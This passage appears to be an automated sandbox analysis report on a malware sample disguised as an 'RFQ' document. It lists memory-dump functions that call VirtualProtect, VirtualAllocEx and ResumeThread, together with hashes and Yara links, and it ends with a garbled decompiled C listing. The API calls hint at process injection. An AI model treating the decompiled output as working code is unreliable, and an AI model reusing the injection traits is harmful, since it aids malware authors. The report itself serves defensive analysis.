                                                                                        • API String ID: 3015937269-0
                                                                                        • Opcode ID: 2fe6b7b0820e5b7fb37fe41cef025363e5f5593cebd42964a9827f96ddc19383
                                                                                        • Instruction ID: 06b68d46c5c9bfd149f8b796356869639d725bb3ce4ab32fa28f04fb322c34cc
                                                                                        • Opcode Fuzzy Hash: 2fe6b7b0820e5b7fb37fe41cef025363e5f5593cebd42964a9827f96ddc19383
                                                                                        • Instruction Fuzzy Hash: A4213BB19002098FCB10DF9AD984BDEBBF4EF88324F548429E519A7340D778AA44CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01255AE8 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 212 1255ae8-1255aec 214 1255aff-1255b70 VirtualProtect 212->214 215 1255aee-1255afe 212->215 217 1255b72-1255b78 214->217 218 1255b79-1255b9a 214->218 215->214 217->218
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01255B63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 27022a22c1a3d64a842293b9eac058e3b7e5afe4ac86e4443b0875b94a06e320
                                                                                        • Instruction ID: 5da800d508f943d3db4f6df4153ea41c76b80b6ad9a12b10caec314982d99838
                                                                                        • Opcode Fuzzy Hash: 27022a22c1a3d64a842293b9eac058e3b7e5afe4ac86e4443b0875b94a06e320
                                                                                        • Instruction Fuzzy Hash: AA211A769003499FCB50CF9AC584BDEBBF4FB48324F14842AE959A3240D3789945CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C21481 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 220 c21481-c21509 VirtualProtect 223 c21512-c21537 220->223 224 c2150b-c21511 220->224 224->223
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C214FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 08480a17bc19416e5762357a4048ec8d8b62dc01661bfc485278524980d3c1c3
                                                                                        • Instruction ID: 5215661c040e0a96ba49d50469f53dc69da456d71bbfde91aa412dac1277ea28
                                                                                        • Opcode Fuzzy Hash: 08480a17bc19416e5762357a4048ec8d8b62dc01661bfc485278524980d3c1c3
                                                                                        • Instruction Fuzzy Hash: 8B2118B19042488FCB10DFAAC844ADEBBF4AF58324F55842EE429A7610C7749944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C21488 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 228 c21488-c21509 VirtualProtect 231 c21512-c21537 228->231 232 c2150b-c21511 228->232 232->231
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C214FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: e7a4c2353fb846f2251efb95d01e2ff2fbd1e5f57970b9be2a612a47c617beb2
                                                                                        • Instruction ID: 6ba747ab6e8e41790ceef9a33008297e5c49cf970383ca7eb689f6128b26b4fa
                                                                                        • Opcode Fuzzy Hash: e7a4c2353fb846f2251efb95d01e2ff2fbd1e5f57970b9be2a612a47c617beb2
                                                                                        • Instruction Fuzzy Hash: 6A11F7B19042089FCB10DFAAC844ADFFBF4EF88324F15842AE529A7610C7789944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01259291 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 241 1259291-12592db 244 12592e2-1259313 VirtualAllocEx 241->244 245 1259315-125931b 244->245 246 125931c-1259341 244->246 245->246
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01259306
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 546fa81c5ff082b7951117d9f3075c0f21d1b75d12c29579e83202acd34fb3ee
                                                                                        • Instruction ID: 82d350919df07e4667894ef0fed3d784e679609ba7d2f51427d99169e98d44cf
                                                                                        • Opcode Fuzzy Hash: 546fa81c5ff082b7951117d9f3075c0f21d1b75d12c29579e83202acd34fb3ee
                                                                                        • Instruction Fuzzy Hash: 981147759042489FCF10DFAAC844ADFBBF5AF89328F24841AE525A7250C7399554CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01255AF0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 236 1255af0-1255b70 VirtualProtect 238 1255b72-1255b78 236->238 239 1255b79-1255b9a 236->239 238->239
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01255B63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: cf72a0e052c8a765edc53f0a43663d9760a93c68d0b1c75015b6030affb9d756
                                                                                        • Instruction ID: 36e79ae78322427bed8ab1437633e0777189c3bd906f45231104d36e3682f34a
                                                                                        • Opcode Fuzzy Hash: cf72a0e052c8a765edc53f0a43663d9760a93c68d0b1c75015b6030affb9d756
                                                                                        • Instruction Fuzzy Hash: 3621F9B59002099FCB10DF9AC984BDEFBF4FF49324F148429E968A7250D778A645CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01259298 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01259306
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: d843d2a95b4132a5a50c35b6a56178f894eb0fdd8a021c220d869e91934c39b1
                                                                                        • Instruction ID: 2e46504311b2a95caea5f11f52261abf9e04f6e8bf787b0c26354e530d39fbf0
                                                                                        • Opcode Fuzzy Hash: d843d2a95b4132a5a50c35b6a56178f894eb0fdd8a021c220d869e91934c39b1
                                                                                        • Instruction Fuzzy Hash: EB1126759002099FCF14DFAAC844BDFBBF5EF88328F248419E525A7250C779A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01259351 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 626dc1b6a2b362d5ac131a2aa76213ff8921aa114e343c0670279b642e2ce579
                                                                                        • Instruction ID: 928554885f490ff552184b97594db4c4134f8e7b484b8c915de73bc6e8cde1aa
                                                                                        • Opcode Fuzzy Hash: 626dc1b6a2b362d5ac131a2aa76213ff8921aa114e343c0670279b642e2ce579
                                                                                        • Instruction Fuzzy Hash: D2115B719043488FCB14DFAAC8447DFBBF5AF89228F24841ED525A7640C7786544CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01259358 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 123b7e42ae17c2aa3f2fcfb649df6a9f5362ab797f3cdb2ed9fc8c48ea7cc661
                                                                                        • Instruction ID: 9207650c0e30e32b338ad7a5ce4de3c59cf0476501d43b3646e34ffbe24da1f7
                                                                                        • Opcode Fuzzy Hash: 123b7e42ae17c2aa3f2fcfb649df6a9f5362ab797f3cdb2ed9fc8c48ea7cc661
                                                                                        • Instruction Fuzzy Hash: 241128719043088FCB24DFAAC8447DFBBF5AB88228F248419D529A7240CB78A944CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD09A0 Relevance: .3, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5b26b297451fa257134a99d3ce29179e0b2b35cf85e72625d55ea9f46dcab4bc
                                                                                        • Instruction ID: 58f45600551280c0208084d2d2d0acac65d4a5e1fd0d5b671c4f894d2f0bcbc0
                                                                                        • Opcode Fuzzy Hash: 5b26b297451fa257134a99d3ce29179e0b2b35cf85e72625d55ea9f46dcab4bc
                                                                                        • Instruction Fuzzy Hash: 8CC14835D0011AAFCB14EFA4C980AADBBBAFF49304F108056E519AB725DB31ED55DFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD0981 Relevance: .3, Instructions: 280COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8b1611d88aa9bbe4b2a3ba73b7cde42d22864e653a15669852def1b590cd43bb
                                                                                        • Instruction ID: 5c79834eabbccf18d537f005c7d86ad648a3a0805b256933167b8082ca79ecb1
                                                                                        • Opcode Fuzzy Hash: 8b1611d88aa9bbe4b2a3ba73b7cde42d22864e653a15669852def1b590cd43bb
                                                                                        • Instruction Fuzzy Hash: D5C14934D0010AAFCB11EFA4C990AADBBBAFF49304F108066E519AB725DB31ED55DF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD00C1 Relevance: .2, Instructions: 196COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc19614b40b47960da28a6222e6755ef0263d34259a7cd0077b9cc6657999358
                                                                                        • Instruction ID: aeaeb853dbbc8001a44b415f93a206fa5fae50f0ec739326aa2e523d3aaa3d51
                                                                                        • Opcode Fuzzy Hash: dc19614b40b47960da28a6222e6755ef0263d34259a7cd0077b9cc6657999358
                                                                                        • Instruction Fuzzy Hash: 3171D47150D3859FCB12CF64D854AAABFF1EF86310719849BD485DB362C734AC49CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD1200 Relevance: .2, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e3296cc837f673dc4dc14227c370dfdd1d712a4da34a3dffc0dd39a365b9101
                                                                                        • Instruction ID: 51d36e6de539d9db340953252d6ca4ae5d1249c116aa2104b8cb092b6b7ee844
                                                                                        • Opcode Fuzzy Hash: 3e3296cc837f673dc4dc14227c370dfdd1d712a4da34a3dffc0dd39a365b9101
                                                                                        • Instruction Fuzzy Hash: 41715935D0050AEFCB01EFA4D8909ADFBBAFF49300B148056E515AB364DB31ED16DBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD11E1 Relevance: .2, Instructions: 173COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a1f7a077987c4a5bc3f3db8bdfbf3aaece719b4171020fd22efec294d0470244
                                                                                        • Instruction ID: 8272e036d5d6d092ef4f2a0cfdb99a5f7ac3156f9f764c9c79758b7e2d759858
                                                                                        • Opcode Fuzzy Hash: a1f7a077987c4a5bc3f3db8bdfbf3aaece719b4171020fd22efec294d0470244
                                                                                        • Instruction Fuzzy Hash: 7E714A39D0050AEFCB05EF94C8909ADBBB6FF49300B248166E515AB364DB31ED56DFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD03A8 Relevance: .1, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a4a1185bcbdb147eaabd660fe9c0b0f83eeb83fb8c53de53057609baff112556
                                                                                        • Instruction ID: 94a132580c626f64e63f04e468bd016ab277bd6bdac747c1aa1b1b0aba7c5766
                                                                                        • Opcode Fuzzy Hash: a4a1185bcbdb147eaabd660fe9c0b0f83eeb83fb8c53de53057609baff112556
                                                                                        • Instruction Fuzzy Hash: A251AB31900109EFCB01DFA0D880AADFBB6FF49300B1480A6E855AB325DB31ED15CFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD038D Relevance: .1, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4255d5ba30c54315ffdf133eb22254cbf273fc6febcd7e393c49e61f30bd0dd3
                                                                                        • Instruction ID: 7b871f5f7dc499f3a87f6c69f10f2c7f6f1a7a0bb58249ed804067a2fa06d3b7
                                                                                        • Opcode Fuzzy Hash: 4255d5ba30c54315ffdf133eb22254cbf273fc6febcd7e393c49e61f30bd0dd3
                                                                                        • Instruction Fuzzy Hash: 25513835D0011AAFCB04DFA4D880AADFBB6FF49304B148066E915AB365DB31ED15DFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD0190 Relevance: .1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e78bbe7c88f1da4ac602502efdc723cce61a5b549f1dbd9d4035e68e50b37ee
                                                                                        • Instruction ID: b86cd7222c8c0d740431c6632a598f9044ae0efe644e4787c14487c3671af4a9
                                                                                        • Opcode Fuzzy Hash: 2e78bbe7c88f1da4ac602502efdc723cce61a5b549f1dbd9d4035e68e50b37ee
                                                                                        • Instruction Fuzzy Hash: 3141F130904309DFCB11DFA4D898AAEBFB5FF8A310B05809BE545EB362C734A905CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DD00A7 Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265966534.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_dd0000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57bc0200de1c6987d62a215856a4e79c7bcceacf4958dd63886c3f63e2924640
                                                                                        • Instruction ID: 487568a83d726495e11c295f1e45e10d25fe464959ebdf204de5f74a0a875cfa
                                                                                        • Opcode Fuzzy Hash: 57bc0200de1c6987d62a215856a4e79c7bcceacf4958dd63886c3f63e2924640
                                                                                        • Instruction Fuzzy Hash: C0B092582089921FC206FB29AA979A7FF70ADCA116399C6E9D0988B1B7B120444B9671
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 01364E14 Relevance: 2.4, Instructions: 2386COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E01364E14(signed int __eax, signed char __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, void* __fp0) {
				signed char _t815;
				signed char _t816;
				signed int _t819;
				signed int _t820;
				signed char _t821;
				signed char _t822;
				signed char _t826;
				intOrPtr* _t828;
				signed char _t829;
				signed char _t830;
				signed char _t831;
				signed char _t833;
				intOrPtr* _t834;
				intOrPtr* _t835;
				intOrPtr* _t836;
				signed char _t838;
				signed char _t839;
				signed char _t841;
				signed char _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				intOrPtr* _t846;
				signed char _t847;
				signed char _t849;
				intOrPtr* _t850;
				signed int _t851;
				signed int _t853;
				signed int* _t1505;
				signed int _t1507;
				signed int _t1508;
				signed char _t1509;
				signed char _t1511;
				signed int _t1513;
				signed char _t1516;
				signed int _t1521;
				signed int _t1522;
				signed char _t1525;
				signed char _t1526;
				intOrPtr* _t1537;
				signed char _t1541;
				intOrPtr* _t1543;
				signed int _t1544;
				signed char _t1545;
				signed char _t1546;
				signed char _t1547;
				signed char _t1548;
				signed char _t1549;
				signed char _t1608;
				signed char _t1610;
				signed char _t1611;
				signed char _t1612;
				signed char _t1613;
				signed char _t1614;
				signed char _t1615;
				signed char _t1616;
				signed char _t1617;
				signed char _t1618;
				signed char _t1619;
				signed char _t1622;
				signed char _t1623;
				signed char _t1722;
				signed int _t1729;
				signed int _t1730;
				signed char _t1731;
				signed char _t1732;
				signed char _t1733;
				signed char _t1734;
				signed char _t1735;
				signed int _t1736;
				signed int _t1770;
				signed int _t1771;
				signed int* _t1772;
				signed int _t1778;
				signed int* _t1779;
				signed int _t1780;
				signed int _t1781;
				signed int* _t1782;
				void* _t1792;
				intOrPtr* _t1793;
				intOrPtr* _t1794;
				void* _t1807;
				void* _t1822;
				signed char _t1856;
				intOrPtr* _t1858;
				intOrPtr* _t1861;
				signed char _t1870;
				signed int _t1890;
				signed char _t1900;
				intOrPtr* _t1902;
				signed char _t1907;
				intOrPtr _t1921;
				signed int _t1923;
				signed int _t1924;
				void* _t2453;

				_t2453 = __fp0;
				_t1547 = __ebx;
				_t1729 = __edx |  *__edx;
				 *_t1729 =  *_t1729 + _t1729;
				_t1778 = __esi + __edi;
				asm("adc eax, 0x1b000006");
				_pop(es);
				 *_t1778 = es;
				 *__eax =  *__eax + __eax;
				asm("sbb ebp, [0x67114]");
				 *__ebx =  *__ebx + __ebx;
				_t1730 = _t1729 |  *_t1729;
				 *__edi =  *__edi + __eax;
				 *_t1778 = es;
				 *__eax =  *__eax + __eax;
				asm("sbb ebp, [0x2b142604]");
				 *__eax =  *__eax + __eax;
				asm("sbb ebp, [edi+0x28]");
				 *__eax =  *__eax + __eax;
				_t815 = __eax |  *(_t1730 + 0x7b021725);
				 *_t815 =  *_t815 & _t815;
				 *_t1730 =  *_t1730 + __ecx;
				_t816 = _t815 | 0x00000012;
				_t1731 = _t1730 +  *_t1730;
				_t1770 = (__edi | _t1778) + _t1778;
				asm("adc eax, 0x1b000007");
				 *(_t1770 + _t816 + 0x2d1b0000) =  *(_t1770 + _t816 + 0x2d1b0000) | __ecx;
				asm("adc al, 0x71");
				es = es;
				 *_t816 =  *_t816 + _t816;
				asm("sbb ecx, [0x8c090312]");
				es = ss;
				 *_t816 =  *_t816 + _t816;
				asm("sbb ebp, [0x2b142604]");
				_t1771 = _t1770 | _t1778;
				es = ss;
				 *_t816 =  *_t816 + _t816;
				asm("sbb ebp, [edi+0x28]");
				 *_t816 =  *_t816 + _t816;
				_t1610 = __ecx |  *_t1731;
				asm("adc esi, [eax]");
				_pop(_t819);
				 *_t819 =  *_t819 + _t819;
				 *__ebx =  *__ebx + _t819;
				 *_t819 =  *_t819 + _t819;
				asm("adc [edx+0x71], esi");
				 *_t819 =  *_t819 + _t819;
				if( *_t819 >= 0) {
					 *_t1731 =  *_t1731 + _t1610;
					_t819 = _t819 |  *_t1778;
					 *__ebx =  *__ebx - _t1610;
					 *_t819 =  *_t819 + _t819;
					 *__ebx =  *__ebx - __ebx;
					 *_t819 =  *_t819 + _t819;
					 *_t819 =  *_t819 + _t819;
					 *_t819 =  *_t819 + _t819;
					 *_t819 =  *_t819 + _t819;
					_t1610 = _t1610 |  *(__ebx + _t819 * 2) |  *(_t1771 + 0x3c) |  *(_t1771 + 0x3d) |  *(_t1771 + 0x3e) |  *_t819;
					 *_t1731 =  *_t1731 + _t1610;
					asm("outsd");
					asm("aas");
				}
				 *_t819 =  *_t819 + _t819;
				_t1611 = _t1610 |  *_t1547;
				asm("adc al, [ecx]");
				 *_t819 =  *_t819 - _t819;
				 *_t1731 =  *_t1731 + _t1611;
				 *_t1771 =  *_t1771 - _t1611;
				 *_t819 =  *_t819 + _t819;
				_t1612 = _t1611 |  *_t819;
				 *[es:eax] =  *[es:eax] + _t819;
				_push(es);
				_push(ss);
				_push(ds);
				asm("outsd");
				 *_t1731 =  *_t1731 + _t1612;
				_t1732 = _t1731 |  *(_t1731 + 0x71);
				 *_t819 =  *_t819 + _t819;
				if( *_t819 >= 0) {
					 *_t1612 =  *_t1612 - _t819;
					 *_t1732 =  *_t1732 + _t1612;
					_push(es);
				}
				_t1733 = _t1732 -  *_t1547;
				 *_t1547 =  *_t1547 ^ _t819;
				 *((intOrPtr*)(_t1733 + 0x4000000)) =  *((intOrPtr*)(_t1733 + 0x4000000)) + _t1733;
				 *_t819 =  *_t819 + _t819;
				asm("adc [0xc1720a], ebx");
				 *((intOrPtr*)(_t819 + 0x28)) =  *((intOrPtr*)(_t819 + 0x28)) + _t1733;
				 *_t1733 =  *_t1733 + _t1612;
				_t820 = _t819 |  *_t1771;
				 *_t1547 =  *_t1547 - _t1612;
				 *_t820 =  *_t820 + _t820;
				_t1613 = _t1612 |  *0x1217070e;
				_t821 = _t820 + 0x128;
				_t1793 = _t1792 -  *((intOrPtr*)(_t1547 + _t821));
				asm("adc [0x7306020a], eax");
				 *_t821 =  *_t821 - _t821;
				 *_t1778 =  *_t1778 + _t821;
				_t822 = _t821 | 0x00000008;
				asm("outsd");
				_t1779 = _t1778 + 1;
				 *_t822 =  *_t822 + _t822;
				_t1734 = _t1733 |  *(_t1733 - 0x15);
				 *_t822 =  *_t822 + _t822;
				if( *_t822 >= 0) {
					_t1771 = _t1771 + 1;
					 *_t822 =  *_t822 + _t822;
					asm("outsd");
					_t1543 = _t822 - 1;
					 *_t1543 =  *_t1543 + _t1543;
					 *_t1543 =  *_t1543 + _t1543;
					_t1547 = _t1547 |  *_t1771;
					_pop(ds);
					asm("adc ecx, [cs:eax]");
					asm("outsd");
					_t1544 = _t1543 - 1;
					 *_t1544 =  *_t1544 + _t1544;
					_t1722 = _t1613 |  *_t822 |  *(_t1771 + 0x49) |  *(_t1771 + 0x49);
					 *_t1544 =  *_t1544 + _t1544;
					_t1734 = _t1734 |  *0xfe1601fe;
					 *_t1547 =  *_t1547 + _t1793;
					 *_t1779 =  *_t1779 + _t1734;
					_t1545 = _t1544 | 0x00466f08;
					 *_t1734 =  *_t1734 + _t1722;
					_t1613 = _t1722 +  *_t1722;
					if(_t1613 < 0) {
						 *_t1545 =  *_t1545 + _t1545;
						_push(es);
						asm("outsd");
						_t1734 = _t1734 - 1;
						 *_t1545 =  *_t1545 + _t1545;
						_t1546 = _t1545 |  *_t1779;
						 *_t1547 =  *_t1547 - _t1613;
						 *_t1734 =  *_t1734 + _t1613;
						_t1822 =  *_t1734;
						do {
							asm("adc eax, [eax+ecx]");
						} while (_t1822 < 0);
						 *_t1546 =  *_t1546 + _t1546;
						if( *_t1546 >= 0) {
							_t1546 = _t1546 + 0x6f;
							_t1807 = _t1807 - 1;
							 *_t1546 =  *_t1546 + _t1546;
							asm("das");
							 *_t1546 =  *_t1546 + _t1546;
							_t1613 = _t1613 |  *_t1546 |  *(_t1771 + 0x2c);
							 *_t1546 =  *_t1546 + _t1546;
							_push(es);
							 *_t1734 =  *_t1734 | _t1613;
						}
						_t1545 = _t1546 -  *_t1546;
						 *_t1547 =  *_t1547 + _t1547;
						 *0x4800 =  *0x4800 ^ _t1545;
						 *0x28110000 =  *0x28110000 + _t1545;
						asm("adc [eax], al");
						 *_t1779 =  *_t1779 + _t1545;
					}
					_t822 = _t1545 - 1;
				}
				 *_t1734 =  *_t1734 + _t1793;
				_t1614 = _t1613 +  *_t822;
				asm("sbb [eax], al");
				 *_t1779 =  *_t1779 + _t822;
				 *_t1793 =  *_t1793 - _t1614;
				 *_t1734 =  *_t1734 + _t1614;
				ss = es;
				 *_t1779 =  *_t1779 - _t1614;
				 *_t1734 =  *_t1734 + _t1614;
				asm("fisub word [edi]");
